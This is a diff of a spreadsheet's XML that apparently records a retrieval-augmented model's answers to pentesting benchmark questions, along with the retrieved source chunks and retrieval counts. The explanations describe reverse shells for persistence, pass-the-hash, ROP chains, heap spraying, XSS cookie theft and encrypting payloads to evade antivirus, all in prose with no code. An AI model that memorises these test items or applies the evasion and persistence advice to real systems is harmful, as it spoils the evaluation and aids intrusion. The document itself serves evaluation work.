 preemware_pentestingeval.pdf (Chunk: 6bfd15ed-9fdd-4602-827d-fc1e81332c5c, Type: sparse, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: e710af68-282f-416e-9fa7-53199146dfe2, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 907956f7-9612-4247-81ec-4ad665e45276, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 129e6ebc-2b06-49e6-92b2-d8afeec326f7, Type: sparse, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 981fc0fa-1e0e-4f3e-b60a-3e4ba9348569, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: de4bc05a-a8db-4d1a-83de-b5b2e148071c, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 11604430-bce7-4434-9029-c5afcc8d9fca, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 431cd243-ba5f-48ae-8a82-2e3831f3a74b, Type: dense, Rank: 9)
-cowWhySo-pentest-redteam-steering.md (Chunk: af7f857c-8e24-45a8-9696-7c637642bf1f, Type: sparse, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 129e6ebc-2b06-49e6-92b2-d8afeec326f7, Type: sparse, Rank: 5)</t>
         </is>
       </c>
       <c r="I67" t="inlineStr">
         <is>
-          <t>Semantic: 7, Keyword: 3, Total: 10</t>
+          <t>Semantic: 3, Keyword: 2, Total: 5</t>
         </is>
       </c>
       <c r="J67" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K67" t="inlineStr">
         <is>
@@ -4954,7 +4622,7 @@
       <c r="F68" t="inlineStr">
         <is>
           <t>Answer: Deploying a reverse shell for establishing persistent access
-Explanation: In red team operations, maintaining persistence on a compromised system is crucial for continual access and data exfiltration. The most effective choice for maintaining such persistence is deploying a reverse shell. This technique allows an attacker to open a communication channel from the compromised machine to the attacker's control server, typically by bypassing firewalls and network security measures that could block incoming connections. Choices such as using a BIND shell and installing a keylogger, while potentially useful, do not inherently provide methods for maintaining persistent remote access. A BIND shell would require external connections to the compromised machine, which might be blocked or logged by network security tools, decreasing stealth and increasing the chance of discovery. Installing a keylogger focuses more on data capturing rather than maintaining network presence. Finally,</t>
+Explanation: In red team operations, maintaining persistence on a compromised system is crucial for continual access and data exfiltration. The most effective choice for maintaining such persistence is deploying a reverse shell. This technique allows an attacker to open a communication channel from the compromised machine to the attacker's control server, typically by bypassing firewalls and network security measures that could block incoming connections. Choices such as using a BIND shell and installing a keylogger, while potentially useful, do not inherently provide methods for maintaining persistent remote access. A BIND shell would require external connections to the compromised machine, which might be blocked or logged by network security tools, decreasing stealth and increasing the chance of discovery. Installing a keylogger focuses more on data capturing rather than maintaining network presence. Finally, creating a custom encryption algorithm for data theft is not directly related to maintaining persistence on a compromised system.</t>
         </is>
       </c>
       <c r="G68" t="inlineStr">
@@ -4968,21 +4636,16 @@
 preemware_pentestingeval.pdf (Chunk: e710af68-282f-416e-9fa7-53199146dfe2, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 527adef7-76ea-429f-b95c-1ddd1d3fc7cb, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 25f16021-0dc2-4174-b5ce-b7e5db9c8551, Type: sparse, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 83d0221c-27bf-48bf-bd78-86ad35de122e, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 8f2cb960-4b58-411c-9fc2-893b0101d44a, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: afdc7c73-427b-4da6-8482-3f723c306b99, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: dccb08f7-fe77-413c-ad44-e332d37d61b1, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 431cd243-ba5f-48ae-8a82-2e3831f3a74b, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: a09e3e07-e30d-49fe-a572-62fa2b787041, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 83d0221c-27bf-48bf-bd78-86ad35de122e, Type: dense, Rank: 5)</t>
         </is>
       </c>
       <c r="I68" t="inlineStr">
         <is>
-          <t>Semantic: 9, Keyword: 1, Total: 10</t>
+          <t>Semantic: 4, Keyword: 1, Total: 5</t>
         </is>
       </c>
       <c r="J68" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K68" t="inlineStr">
         <is>
@@ -5021,7 +4684,7 @@
       <c r="F69" t="inlineStr">
         <is>
           <t>Answer: Pass-the-hash
-Explanation: The most effective method for lateral movement in a Windows domain when an attacker has gained NTLM hash values is to use the 'Pass-the-hash' technique. This involves using the stolen hash values to authenticate to other network resources without needing the plain text password. Pass-the-ticket, while related to Kerberos authentication, does not involve NTLM hash values. Pass-the-cookie is relevant in web security contexts but is unrelated to NTLM or lateral movement in Windows domains. Man-in-the-middle attacks involve intercepting communications between two systems to capture or modify the data being exchanged, which does not directly apply to the scenario of authenticating with stolen hash values.</t>
+Explanation: Pass-the-hash attack is specifically designed to utilize a hash (like NTLM hash in Windows systems) to authenticate to other network resources without the need for the plain text password. This method exploits the way Windows handles authentication using hashed versions of user passwords. On the other hand, 'Pass-the-ticket' exploits Kerberos authentication, using stolen Kerberos tickets, not hash values.</t>
         </is>
       </c>
       <c r="G69" t="inlineStr">
@@ -5035,21 +4698,16 @@
 preemware_pentestingeval.pdf (Chunk: 5f4ba9c9-4739-4151-9e88-342275d06efc, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 37cafc74-ea7a-4ffa-8b89-f7a19624e678, Type: sparse, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: aa428684-852d-4d02-bc06-338f87060720, Type: sparse, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: f3e9031e-a33d-4118-b256-b8f4e197689f, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 527adef7-76ea-429f-b95c-1ddd1d3fc7cb, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: c54f468f-1388-41a7-b8ef-35e5cc3eac90, Type: sparse, Rank: 7)
-cowWhySo-pentest-redteam-steering.md (Chunk: f9bf9901-c3d6-4172-925b-486e460b1f29, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: a09e3e07-e30d-49fe-a572-62fa2b787041, Type: sparse, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 6b3589ca-f3ff-47e3-85e1-89c85c8b6914, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: f3e9031e-a33d-4118-b256-b8f4e197689f, Type: dense, Rank: 5)</t>
         </is>
       </c>
       <c r="I69" t="inlineStr">
         <is>
-          <t>Semantic: 6, Keyword: 4, Total: 10</t>
+          <t>Semantic: 3, Keyword: 2, Total: 5</t>
         </is>
       </c>
       <c r="J69" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K69" t="inlineStr">
         <is>
@@ -5088,7 +4746,7 @@
       <c r="F70" t="inlineStr">
         <is>
           <t>Answer: ROP chain
-Explanation: The correct technique to bypass memory protection mechanisms such as DEP in the context of buffer overflow exploitation is a 'ROP chain' or Return-Oriented Programming chain. ROP is a sophisticated exploit method that involves executing code snippets already present in a process's memory (called gadgets) to achieve the desired outcome, effectively bypassing DEP.</t>
+Explanation: The correct technique to bypass memory protection mechanisms such as DEP in the context of buffer overflow exploitation is a 'ROP chain' or Return-Oriented Programming chain. ROP is a sophisticated exploit method that involves executing code snippets already present in a process's memory (called gadgets) in a non-executable stack, effectively allowing an attacker to execute arbitrary code despite DEP being enabled.</t>
         </is>
       </c>
       <c r="G70" t="inlineStr">
@@ -5102,21 +4760,16 @@
 preemware_pentestingeval.pdf (Chunk: 04735009-c6ee-4797-bd4b-2a07eaefa023, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 0b679bf7-8b92-45d3-bff1-b51eaa493d7f, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 20364b0e-e2d9-4399-be28-1448664a28eb, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 1788a271-9788-4fa2-a1ab-d1d7f02f5ced, Type: sparse, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 885d670c-13eb-480a-b114-6464cb752c48, Type: sparse, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 98a0a4b0-83b8-4181-ac2e-6cdf5bbb1ea1, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: ac04819c-308e-427d-be42-4bffc6fce7a5, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 56fbf155-1ed2-4314-814d-07f041a2f2c5, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 211c6f97-6412-428f-9b6c-66975c93fba1, Type: sparse, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 1788a271-9788-4fa2-a1ab-d1d7f02f5ced, Type: sparse, Rank: 5)</t>
         </is>
       </c>
       <c r="I70" t="inlineStr">
         <is>
-          <t>Semantic: 7, Keyword: 3, Total: 10</t>
+          <t>Semantic: 4, Keyword: 1, Total: 5</t>
         </is>
       </c>
       <c r="J70" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K70" t="inlineStr">
         <is>
@@ -5155,7 +4808,7 @@
       <c r="F71" t="inlineStr">
         <is>
           <t>Answer: Buffer Overflow
-Explanation: A Buffer Overflow occurs when more data is put into a fixed-length buffer than it can handle. This leads to the overflow of extra data into adjacent buffers, which can corrupt or overwrite the valid data held in them, including data that controls program execution. This vulnerability can be exploited by attackers to inject malicious shellcode into the input fields of applications, leading thereby potentially to arbitrary code execution on the server. Cross-site Scripting (XSS) and SQL Injection vulnerabilities, in contrast, exploit the handling of input data to perform malicious actions within the user session or database respectively, without necessarily allowing arbitrary code execution on the server itself. Denial of Service (DoS) attacks rather aim to prevent legitimate users from accessing resources by overwhelming the system with requests or other means, without necessarily involving arbitrary code execution on the server.</t>
+Explanation: A buffer overflow occurs when more data is put into a fixed-length buffer than it can handle. This leads to the overflow of extra data into adjacent buffers, which can corrupt or overwrite the valid data held in them, including data that controls program execution. This vulnerability can be exploited by attackers to inject malicious shellcode into the input fields of applications, leading thereby potentially to arbitrary code execution on the server. Cross-site Scripting (XSS) and SQL Injection vulnerabilities, in contrast, exploit the handling of input data to perform malicious actions within the user session or database respectively, without necessarily allowing arbitrary code execution on the server itself. Denial of Service (DoS) attacks rather aim to prevent legitimate users from accessing a service or resource by overwhelming it with requests or other forms of traffic.</t>
         </is>
       </c>
       <c r="G71" t="inlineStr">
@@ -5169,21 +4822,16 @@
 preemware_pentestingeval.pdf (Chunk: 53e5bc02-bd2f-46bf-ad66-9a3bdbeb1634, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 11f1623f-812b-4ee5-82d3-4f85dcd656de, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 0adf643c-3c85-44a4-ab1e-397efae38e4b, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: a7b7c8da-d77a-4332-83f4-858823f9b832, Type: sparse, Rank: 5)
-cowWhySo-pentest-redteam-steering.md (Chunk: 0f10f6d3-5dcc-4aad-bb64-5a4e62ffeeac, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 7b617c4a-1b3b-4481-8bf5-6d0fe80f1b8e, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: c9e9ff7d-8a8e-4a80-a12c-716d9a3e415c, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 884a29d4-07cf-44d8-bf3a-5149b2c69f9a, Type: sparse, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: ca58027f-5c3d-4e98-93a5-6f71ac3fc704, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: a7b7c8da-d77a-4332-83f4-858823f9b832, Type: sparse, Rank: 5)</t>
         </is>
       </c>
       <c r="I71" t="inlineStr">
         <is>
-          <t>Semantic: 8, Keyword: 2, Total: 10</t>
+          <t>Semantic: 4, Keyword: 1, Total: 5</t>
         </is>
       </c>
       <c r="J71" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K71" t="inlineStr">
         <is>
@@ -5236,21 +4884,16 @@
 preemware_pentestingeval.pdf (Chunk: 42440b95-57e2-465a-9d3c-3ace7070d2a0, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 25f16021-0dc2-4174-b5ce-b7e5db9c8551, Type: sparse, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: c96d3d37-95b2-4aeb-8985-05b07bc002c3, Type: sparse, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 08b874c5-403c-40bb-98c9-b933ea5735a6, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: e14e7566-1002-4675-b5db-65eecaad633c, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 54db32bd-27d9-46d8-9de5-8da86ed6b7a9, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: c0eaca88-9ae9-4e88-851c-9feb19c23d7f, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 4f2b8ecd-a7ee-4877-8c74-4b0c764a70d0, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: f10ff4de-8adf-4b9b-a49e-df2721541289, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 08b874c5-403c-40bb-98c9-b933ea5735a6, Type: dense, Rank: 5)</t>
         </is>
       </c>
       <c r="I72" t="inlineStr">
         <is>
-          <t>Semantic: 8, Keyword: 2, Total: 10</t>
+          <t>Semantic: 3, Keyword: 2, Total: 5</t>
         </is>
       </c>
       <c r="J72" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K72" t="inlineStr">
         <is>
@@ -5289,7 +4932,7 @@
       <c r="F73" t="inlineStr">
         <is>
           <t>Answer: Exploitation of Windows SMB Protocol
-Explanation: In red team operations targeting networks with a predominantly Windows-based infrastructure, exploiting vulnerabilities in the Windows SMB (Server Message Block) Protocol is highly effective for establishing persistence. This protocol is integral to Windows networking and is extensively used for file sharing and printer services, making it a prime target as its exploitation can potentially provide broad access to networked resources and systems. The use of Adobe PDF vulnerabilities and SQL Injection primarily relate to web applications and user interactions rather than network device management interfaces. Buffer overflow in Linux SUID binaries is not relevant to the context of Windows-based infrastructure.</t>
+Explanation: In red team operations targeting networks with a predominantly Windows-based infrastructure, exploiting vulnerabilities in the Windows SMB (Server Message Block) Protocol is highly effective for establishing persistence. This protocol is integral to Windows networking and is extensively used for file sharing and printer services, making it a prime target as its exploitation can potentially provide broad access to networked resources and systems. The use of Adobe PDF vulnerabilities and SQL Injection primarily apply to web applications and are not specific to Windows-based infrastructure. Buffer overflow in Linux SUID binaries is irrelevant for a primarily Windows-based infrastructure.</t>
         </is>
       </c>
       <c r="G73" t="inlineStr">
@@ -5303,21 +4946,16 @@
 preemware_pentestingeval.pdf (Chunk: 527adef7-76ea-429f-b95c-1ddd1d3fc7cb, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: eab6ace7-159e-4140-8209-e300bd81514c, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 25f16021-0dc2-4174-b5ce-b7e5db9c8551, Type: sparse, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 431cd243-ba5f-48ae-8a82-2e3831f3a74b, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 83d0221c-27bf-48bf-bd78-86ad35de122e, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: afdc7c73-427b-4da6-8482-3f723c306b99, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 2c921c88-12fa-4411-aa17-010f9d3e1f0b, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: dccb08f7-fe77-413c-ad44-e332d37d61b1, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 33faa168-7953-48fd-a109-3efbdaec8d52, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 431cd243-ba5f-48ae-8a82-2e3831f3a74b, Type: dense, Rank: 5)</t>
         </is>
       </c>
       <c r="I73" t="inlineStr">
         <is>
-          <t>Semantic: 9, Keyword: 1, Total: 10</t>
+          <t>Semantic: 4, Keyword: 1, Total: 5</t>
         </is>
       </c>
       <c r="J73" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K73" t="inlineStr">
         <is>
@@ -5370,21 +5008,16 @@
 preemware_pentestingeval.pdf (Chunk: ea6341c8-0406-4563-802b-a1286b737502, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: ac04819c-308e-427d-be42-4bffc6fce7a5, Type: sparse, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 9fa8d825-a542-4bef-bb9f-e7974f65d4a4, Type: sparse, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 821d649c-fe1a-45ff-9eb0-0916ba88ae25, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: da8d5790-4c9c-4230-96d7-cd1f71b7c89c, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: f409a119-1bfa-4cf3-8cb8-c081f05be00d, Type: sparse, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 53e5bc02-bd2f-46bf-ad66-9a3bdbeb1634, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: a6481f2a-4a32-4aab-8afe-82b2253400e6, Type: sparse, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: aebf1bc1-657b-4a4c-836d-12a9f04a6ccb, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 821d649c-fe1a-45ff-9eb0-0916ba88ae25, Type: dense, Rank: 5)</t>
         </is>
       </c>
       <c r="I74" t="inlineStr">
         <is>
-          <t>Semantic: 6, Keyword: 4, Total: 10</t>
+          <t>Semantic: 3, Keyword: 2, Total: 5</t>
         </is>
       </c>
       <c r="J74" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K74" t="inlineStr">
         <is>
@@ -5423,7 +5056,7 @@
       <c r="F75" t="inlineStr">
         <is>
           <t>Answer: Cross-Site Scripting (XSS) exploiting session cookies
-Explanation: The correct answer is 'Cross-Site Scripting (XSS) exploiting session cookies'. Modern web applications often use extensive client-side processing and storage mechanisms, including session cookies, to enhance performance and user experience. By exploiting XSS vulnerabilities, an attacker can inject malicious scripts into web pages viewed by other users. These scripts can then be used to steal session cookies, allowing attackers to hijack user sessions and gain unauthorized access to their accounts. The other choices, while valid vulnerabilities, target different aspects and layers of an application's environment: 'ROP chains in a non-executable stack', 'Buffer overflow in an application with ASLR and DEP', and 'SQL injection using Time-based techniques' are not specifically designed for exploiting client-side data storage or session cookies.</t>
+Explanation: The correct answer is 'Cross-Site Scripting (XSS) exploiting session cookies'. Modern web applications often use extensive client-side processing and storage mechanisms, including session cookies, to enhance performance and user experience. By exploiting XSS vulnerabilities, an attacker can inject malicious scripts into web pages viewed by other users. These scripts can then be used to steal session cookies, allowing attackers to hijack user sessions and gain unauthorized access to their accounts. The other choices, while valid vulnerabilities, target different aspects and layers of an application's environment: 'ROP chain in a non-executable stack', 'Buffer overflow in an application with ASLR and DEP', and 'SQL injection using Time-based techniques'.</t>
         </is>
       </c>
       <c r="G75" t="inlineStr">
@@ -5437,21 +5070,16 @@
 preemware_pentestingeval.pdf (Chunk: 907956f7-9612-4247-81ec-4ad665e45276, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: da05222e-12f4-464d-a4cf-e755c02cdecf, Type: sparse, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 1788a271-9788-4fa2-a1ab-d1d7f02f5ced, Type: sparse, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: acf48ab4-50fb-4cbb-99bd-66d6a3e9f820, Type: sparse, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 3cab02c9-e3d9-4f69-b30b-cf3644f3e1c0, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 8d1f7c98-1820-4eb2-ad4a-d781b911d08a, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 858a83cd-a7f8-40d5-b144-5389618e38f9, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: a7b7c8da-d77a-4332-83f4-858823f9b832, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 211c6f97-6412-428f-9b6c-66975c93fba1, Type: sparse, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: acf48ab4-50fb-4cbb-99bd-66d6a3e9f820, Type: sparse, Rank: 5)</t>
         </is>
       </c>
       <c r="I75" t="inlineStr">
         <is>
-          <t>Semantic: 6, Keyword: 4, Total: 10</t>
+          <t>Semantic: 2, Keyword: 3, Total: 5</t>
         </is>
       </c>
       <c r="J75" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K75" t="inlineStr">
         <is>
@@ -5490,7 +5118,7 @@
       <c r="F76" t="inlineStr">
         <is>
           <t>Answer: Fuzzing the application with random data input
-Explanation: Fuzzing the application with random data input is the most effective technique for identifying potential buffer overflow vulnerabilities. This method involves sending large amounts of random data to an application in order to trigger a crash. If a crash occurs, it often indicates the existence of memory corruption vulnerabilities such as buffer overflows, which can then potentially be exploited. Auditing source code for unsanitized input functions is also effective but requires more manual effort and knowledge of the specific programming language used. Running the application in a debugger with breakpoints can help identify issues during runtime, but it's not as efficient or comprehensive as fuzzing. Monitoring network traffic for unencrypted data is related to data security rather than identifying buffer overflow vulnerabilities specifically.</t>
+Explanation: Fuzzing the application with random data input is the most effective technique for identifying potential buffer overflow vulnerabilities. This method involves sending large amounts of random data to an application in order to trigger a crash. If a crash occurs, it often indicates the existence of memory corruption vulnerabilities such as buffer overflows, which can then potentially be exploited. Auditing source code for unsanitized input functions is also effective but requires manual review of the code, while running the application in a debugger with breakpoints and monitoring network traffic for unencrypted data are more focused on specific aspects of security testing rather than directly identifying buffer overflow vulnerabilities.</t>
         </is>
       </c>
       <c r="G76" t="inlineStr">
@@ -5504,21 +5132,16 @@
 preemware_pentestingeval.pdf (Chunk: 04735009-c6ee-4797-bd4b-2a07eaefa023, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 211c6f97-6412-428f-9b6c-66975c93fba1, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 8d479ebf-923b-4de8-adcf-31ea07821612, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: e32f0786-db66-459f-9257-ca7a63518524, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: e79289ff-16f2-4a3d-9cf9-a3a92e8bbfd6, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: afb1aa10-4e40-43c7-8bb6-da790de907eb, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 98a0a4b0-83b8-4181-ac2e-6cdf5bbb1ea1, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 86b4e7ca-0f90-495f-8a03-ae7c47e5d3b4, Type: sparse, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: c8526d10-31df-4fac-9a82-6d9008822382, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: e32f0786-db66-459f-9257-ca7a63518524, Type: dense, Rank: 5)</t>
         </is>
       </c>
       <c r="I76" t="inlineStr">
         <is>
-          <t>Semantic: 9, Keyword: 1, Total: 10</t>
+          <t>Semantic: 5, Keyword: 0, Total: 5</t>
         </is>
       </c>
       <c r="J76" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K76" t="inlineStr">
         <is>
@@ -5557,7 +5180,7 @@
       <c r="F77" t="inlineStr">
         <is>
           <t>Answer: Heap spray
-Explanation: Heap spray is a technique used in exploit development that involves filling a region of the process's memory with copies of the shellcode. By doing this, an attacker increases the probability that their malicious code is present at a predictable location, which is particularly useful when exploiting memory corruption vulnerabilities like buffer overflows in a memory area such as the heap. Memory buffer overflow and SQL injection are also exploit techniques, but they do not specifically relate to the manipulation of dynamic memory allocation mechanisms. Cross-site scripting is focused on injecting malicious scripts into web browsers rather than manipulating dynamic memory allocation mechanisms.</t>
+Explanation: Heap spray is a technique used in exploit development that involves filling a region of the process's memory with copies of the shellcode. By doing this, an attacker increases the probability that their malicious code is present at a predictable location, which is particularly useful when exploiting memory corruption vulnerabilities like buffer overflows in a memory area such as the heap. Memory buffer overflow and SQL injection are also exploit techniques, but they do not specifically relate to the manipulation of dynamic memory allocation mechanisms. Cross-site scripting is focused on injecting malicious scripts into web applications, not manipulating dynamic memory allocation mechanisms.</t>
         </is>
       </c>
       <c r="G77" t="inlineStr">
@@ -5571,21 +5194,16 @@
 preemware_pentestingeval.pdf (Chunk: dccd4c32-0780-4b80-8997-5b0089e63b5e, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: b09ec26e-5654-4c4b-bb3a-f02c97266fbc, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 48095558-19bb-4a42-9c2f-c85be495918f, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: d175cfd5-e779-4122-ad9c-10aeb562c1b8, Type: sparse, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 9fa8d825-a542-4bef-bb9f-e7974f65d4a4, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 0b679bf7-8b92-45d3-bff1-b51eaa493d7f, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: b28d496d-a5a2-41f1-a542-c1345b6b7e18, Type: sparse, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 83612a00-ff68-4885-bd22-958afc16e77e, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: d81db727-e5e2-44eb-8aa1-20ab3f8883a1, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: d175cfd5-e779-4122-ad9c-10aeb562c1b8, Type: sparse, Rank: 5)</t>
         </is>
       </c>
       <c r="I77" t="inlineStr">
         <is>
-          <t>Semantic: 8, Keyword: 2, Total: 10</t>
+          <t>Semantic: 4, Keyword: 1, Total: 5</t>
         </is>
       </c>
       <c r="J77" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K77" t="inlineStr">
         <is>
@@ -5624,7 +5242,7 @@
       <c r="F78" t="inlineStr">
         <is>
           <t>Answer: Encrypting the payload to evade signature-based detection
-Explanation: Encrypting the payload to evade signature-based detection is an effective method used by attackers to bypass static signature-based detection mechanisms in antivirus systems. By encrypting the contents of the malicious payload, its digital signature is altered, rendering traditional signature-based detection ineffective as the encryption changes the file's appearance to the defensive mechanisms without altering its functional behavior when decrypted after delivery. The other options, while plausible in different contexts, are generally easier for modern antiviruses to detect through heuristic or behavior-based analysis.</t>
+Explanation: Encrypting the payload to evade signature-based detection is an effective method used by attackers to bypass static signature-based detection mechanisms in antivirus systems. By encrypting the contents of the malicious payload, its digital signature is altered, rendering traditional signature-based detection ineffective as the encryption changes the file's appearance to the defensive mechanisms without altering its functional behavior when decrypted after delivery. The other options, while plausible in different contexts, are less likely to evade static signature-based antivirus detection consistently. Polymorphic engines generate multiple, varying instances of the same malware, altering its binary pattern without changing its core functions. This renders simple signature-based detection almost useless, as the signatures will not match the altered versions. Changing the malware's hash via basic encryption and using a common packer can also avoid detection, but these methods are generally easier for modern antiviruses to detect through heuristic or behavior-based analysis. Altering the metadata of the malware file without changing the code does not affect the operational code, hence it's less likely to evade a scan that inspects code not metadata.</t>
         </is>
       </c>
       <c r="G78" t="inlineStr">
@@ -5638,21 +5256,16 @@
 preemware_pentestingeval.pdf (Chunk: 3342a1f7-6035-41e2-b639-fe04c612dd59, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 2ed8c0e8-d43e-4d09-a902-9e44e6d56c0b, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 9c8cb7b3-6564-437c-abb3-13701475b3c2, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: e6fb6d20-9ca3-4e39-a088-85ce208330ed, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 85910ce2-6c43-4a0c-80ff-34aad76e9dd5, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: dbd9551c-209f-4286-a6ee-99530ee8bc83, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: ee64972b-a5c2-4f26-8620-c7e453c7a373, Type: sparse, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 91d370a9-8209-4668-b903-1708398faa93, Type: dense, Rank: 9)
-cowWhySo-pentest-redteam-steering.md (Chunk: 1341b7ef-18b4-4f51-93c8-22accef7ff54, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: e6fb6d20-9ca3-4e39-a088-85ce208330ed, Type: dense, Rank: 5)</t>
         </is>
       </c>
       <c r="I78" t="inlineStr">
         <is>
-          <t>Semantic: 9, Keyword: 1, Total: 10</t>
+          <t>Semantic: 5, Keyword: 0, Total: 5</t>
         </is>
       </c>
       <c r="J78" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K78" t="inlineStr">
         <is>
@@ -5691,7 +5304,7 @@
       <c r="F79" t="inlineStr">
         <is>
           <t>Answer: Burp Suite for modifying HTTP/HTTPS traffic in real time
